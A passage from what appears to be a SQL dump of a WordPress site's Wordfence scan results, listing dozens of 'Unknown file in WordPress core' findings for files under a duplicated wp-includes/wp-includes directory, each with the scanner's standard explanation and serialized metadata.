More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-locale.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33797,1631564681,1631564681,'new','knownfile',75,'18029643af851ce8e76cfc557bd57ac8','d55f98f9575a5e43c7b1009ea43584d5','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-matchesmapregex.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-matchesmapregex.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33798,1631564681,1631564681,'new','knownfile',75,'725b32d3268994909f36a06733fcd8f4','29691773e1ac8f4d9d7a5d3e5af00000','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-meta-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-meta-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33799,1631564681,1631564681,'new','knownfile',75,'2f3e2950d064508606ebded6ab0a8dcd','c75353afa6242b9b5bffe3f0ba3ad138','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-metadata-lazyloader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-metadata-lazyloader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33800,1631564681,1631564681,'new','knownfile',75,'1ac2f1606a8b2c35a75787452a8db45c','ee49b615e44063af7b82ea4383b23eec','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-network-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-network-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33801,1631564681,1631564681,'new','knownfile',75,'e39b949c03a094b9aa8050478be14679','7c064be7e8c72f294bf6591d6e08ac9d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-network.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-network.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33802,1631564681,1631564681,'new','knownfile',75,'63af136bddfabfdc444f53d8e2fb9e09','264c60f61b096a825c349c292dd9f342','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-object-cache.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-object-cache.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33803,1631564681,1631564681,'new','knownfile',75,'64d177550f1712b383c8932cf0b66b89','d5c7bc88ac5bd083aed6a6cb56e01de6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-oembed-controller.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-oembed-controller.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33804,1631564681,1631564681,'new','knownfile',75,'c9f5f41189fb6a850250f842e8e8fe78','a2554eaf99bde245d60369f4b0dc9dc0','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-oembed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-oembed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33805,1631564681,1631564681,'new','knownfile',75,'3a307568b91c4c6d21d6b720caced651','86ea21b45a531ec807b8774ef4c85931','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-paused-extensions-storage.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-paused-extensions-storage.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33806,1631564681,1631564681,'new','knownfile',75,'1edebb36b535c614d9e7c7c094f19da8','ec56fa728c9cd676a05c14948e3d79c7','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-post-type.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-post-type.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33807,1631564681,1631564681,'new','knownfile',75,'ec6c6d4f3c1555e5a7b967aaa9b1e76b','f2fd3c08867fb69e5953f433ebf9ee9e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-post.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-post.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33808,1631564681,1631564681,'new','knownfile',75,'348f6eaed8b8199513e32b016e9b9d88','b195805576d759b527638dd78610e9be','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33809,1631564681,1631564681,'new','knownfile',75,'903c7b3f7f609ffe286ad3864d9e9fee','d190b80fa0cefda41c313f7669d269ad','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/class-wp-recovery-mode-cookie-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33810,1631564681,1631564681,'new','knownfile',75,'f7def5bb2a5c2be7e9c5c6405c24980b','b826b84d14531edd49a76d2bb94334df','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-email-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/class-wp-recovery-mode-email-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33811,1631564681,1631564681,'new','knownfile',75,'d6f11c12e3e68c19ee345f6aa843ae46','0640a7a4aac321f5d32276c038f0d8fc','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-key-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-recovery-mode-key-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33812,1631564681,1631564681,'new','knownfile',75,'991e7fd39daaa7012f07c3b34adeb88e','cfbd901aa4b92617376159f8511d9cb3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode-link-service.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/class-wp-recovery-mode-link-service.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33813,1631564681,1631564681,'new','knownfile',75,'4a38afa8a6ab3dd4e520dda39552fedc','9c9a64813cad99e519804a65d26b6d41','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-recovery-mode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-recovery-mode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33814,1631564681,1631564681,'new','knownfile',75,'7ea6497f4859a5b1c702aa81632a990b','05396246a9b04cd50be3c20cabe2e20f','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-rewrite.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-rewrite.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33815,1631564681,1631564681,'new','knownfile',75,'7847861f30970cec4b64285c1cdc8424','629319fe02592198cb044faf47be0ac3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-role.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-role.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33816,1631564681,1631564681,'new','knownfile',75,'f6b6fb60e85e85206974810aee0b198d','a4f684896f8093413cc560a337017f1a','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-roles.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-roles.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33817,1631564681,1631564681,'new','knownfile',75,'f12b27abdd06d872749835db35b43e00','67d655eb1a234275fb4e8ef761d34f36','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-session-tokens.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-session-tokens.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33818,1631564681,1631564681,'new','knownfile',75,'d409ce56062314c2dbeee3930ba227a4','12e055bf46f9e785f098fa2cd6c8799d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-simplepie-file.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-simplepie-file.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33819,1631564681,1631564681,'new','knownfile',75,'5143884bbc4adcbffde2ad7daa1e423e','7c7995df88cb7ea537fcc7dfcbb075ff','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33820,1631564681,1631564681,'new','knownfile',75,'49842ecc9a94475b04663d56cb3dcd08','3a471b17335b39bd08a7c842e157edbe','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-site-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-site-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33821,1631564681,1631564681,'new','knownfile',75,'e622d8d6ff0a18aa0af79ffd4af71c22','eadef06e166e249e719ae0cc5fad332c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-site.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-site.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33822,1631564681,1631564681,'new','knownfile',75,'f3f612ca95ecce0dc57e1e4decaf4fe9','88499bb4caef1a4500be99a92da88026','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-tax-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-tax-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33823,1631564681,1631564681,'new','knownfile',75,'e5983fe80e12b944d6eb52d239b3ea7e','026dca1a5226de2f52a76d68606db339','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-taxonomy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/class-wp-taxonomy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33824,1631564681,1631564681,'new','knownfile',75,'fbcbd0479faa9cdd5f73118793e50b44','497da53fd4160e0915c74fbf974752a6','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-term-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-term-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33825,1631564681,1631564681,'new','knownfile',75,'d7eb77323ce4cf9814176466482ffe23','c65c0e0c993f6bbdfac06802115f6676','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-term.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-term.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33826,1631564681,1631564681,'new','knownfile',75,'b6097c8e96bff41fbf3f2ec5fbfd0915','cc47083706e3f74172717ca739a5078d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/class-wp-text-diff-renderer-inline.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33827,1631564682,1631564682,'new','knownfile',75,'5efb19a5d32bf1406f2788065ce2873e','8f2ba1b4b3a36fdd24aebd2cd15e71a7','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-text-diff-renderer-table.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/class-wp-text-diff-renderer-table.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33828,1631564682,1631564682,'new','knownfile',75,'a61f2721b9f6d666c8ba3cd0ab8b18c8','b1a40f1a3b8ddd60ae92a9f2528b08fa','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-theme.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-theme.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33829,1631564682,1631564682,'new','knownfile',75,'ca03eed53bdfcd23afb4914eac4a11a0','da1c2e5dbaf61733c0a2cbfecefa5bfb','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-meta-session-tokens.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/class-wp-user-meta-session-tokens.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33830,1631564682,1631564682,'new','knownfile',75,'7d7338720b371bc706c62e4e570a9e81','1ee72b01e3bb4d63dbddd096e10f2d0c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-user-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33831,1631564682,1631564682,'new','knownfile',75,'fe5da5c7437c28383d1ee2a9dd038bd4','b48b83eeec9c77ea788e7740aea8b79c','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user-request.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-user-request.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33832,1631564682,1631564682,'new','knownfile',75,'12dd0cf73ba278bf78ec372154eb1e4c','5a6dee6b45327475acb6a1ec8b90ee92','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-user.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/class-wp-user.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33833,1631564682,1631564682,'new','knownfile',75,'75fa282baddaa8ac806e181e4c4f0d03','9aee99f809bb2999b6b9090640f76356','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-walker.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-walker.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33834,1631564682,1631564682,'new','knownfile',75,'c26216a1c55064173a7aaeae8db974d5','b0fda41ea3315690b2b3b072f4730cf3','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-widget-factory.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-widget-factory.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33835,1631564682,1631564682,'new','knownfile',75,'823ea618da74c2eeb3b01576c8c33dab','99b81f48c6ada10dbdb5e029f726e173','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-widget.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-widget.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33836,1631564682,1631564682,'new','knownfile',75,'a1b773dc6b371f44dbd7b33888598f9c','21bd578467de26221fd9b23dbfbc9918','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-xmlrpc-server.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 